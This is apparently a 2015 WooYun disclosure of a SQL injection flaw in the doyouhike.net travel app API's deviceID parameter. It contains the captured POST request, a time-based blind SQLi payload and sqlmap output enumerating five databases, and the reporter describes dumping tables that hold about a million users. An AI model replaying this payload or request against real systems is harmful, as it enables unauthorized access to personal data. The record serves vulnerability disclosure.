当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135917

漏洞标题:磨房网SQL注入五(5库 百万用户信息告急)

相关厂商:doyouhike.net

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-08-22 20:18

修复时间:2015-10-07 10:26

公开时间:2015-10-07 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-23: 厂商已经确认,细节仅向厂商公开
2015-09-02: 细节向核心白帽子及相关领域专家公开
2015-09-12: 细节向普通白帽子公开
2015-09-22: 细节向实习白帽子公开
2015-10-07: 细节向公众公开

简要描述:

上次你们送了礼物 那个 磨小驴 好可爱 那个啥 亲 能再送几个磨小驴吗? O(∩_∩)O

详细说明:

这次测试了下 你们的 去玩 app 去玩 1.8.0 ios版 版本图就不发了 下面是本次测试时抓的注入点
post数据包:

POST /user/bind_device_user?auth=08e92597aaff25c7cde163c02d98c1c9 HTTP/1.1
Host: ybapi.doyouhike.net
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 76
Connection: close
Accept: application/json
User-Agent: ?????? 1.8.0 rv:4.7.4 (iPad; iPhone OS 8.4; zh_CN)
userID=1144008&deviceType=ios&deviceID=1596AB2C-DA17-4540-8500-6F29D2830C47


参数 deviceID 可注入

0.png


跑了下数据 跑的那叫一个艰辛啊
其他的表跑起来太慢 所以就不跑了 g3rc 有 265张表

2.png


我们来看看 sphinx 这个库 有11张表 却只跑出来了 9 张表的数据 最重要的用户数量没出来

4.png


5.png


于是猜想 注入的时候 可能多跑了一个 A 把A去掉后 跑了下 字段和数量就出来了 百万的用户(其他的库就没去看了 至少不会少了百万吧)

6.png


7.png


其实···从我的个人ID 那也可以判断 可是怕 乌云审核 不承认 所以····

8.png


还有就是 这个点 可以爆出路径来的···

9.png


漏洞证明:

POST parameter 'deviceID' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 554 HTTP(s) req
uests:
---
Parameter: deviceID (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userID=1144008&deviceType=ios&deviceID=1596AB2C-DA17-4540-8500-6F29
D2830C47' AND (SELECT * FROM (SELECT(SLEEP(5)))AkiF) AND 'FyzL'='FyzL
---
[17:01:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[17:01:37] [INFO] fetching database names
[17:01:37] [INFO] fetching number of databases
[17:01:37] [INFO] retrieved:
[17:01:37] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
5
[17:01:53] [INFO] retrieved:
[17:01:58] [INFO] adjusting time delay to 3 seconds due to good response times
information_schema
[17:06:07] [INFO] retrieved: bizrc
[17:07:10] [INFO] retrieved: click
[17:08:13] [INFO] retrieved: g3rc
[17:09:05] [INFO] retrieved: sphinx
[17:11:32] [ERROR] invalid character detected. retrying..
[17:11:32] [WARNING] increasing time delay to 4 seconds
available databases [5]:
[*] bizrc
[*] click
[*] g3rc
[*] information_schema
[*] sphinx
[17:11:33] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 454 times
[17:11:33] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ybapi.doyouhike.net'
[*] shutting down at 17:11:33

修复方案:

厂商 会送 磨小驴 给我吗?

10.jpg

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-23 10:25

厂商回复:

相当严重的参数过滤不当,正在修复

最新状态:

暂无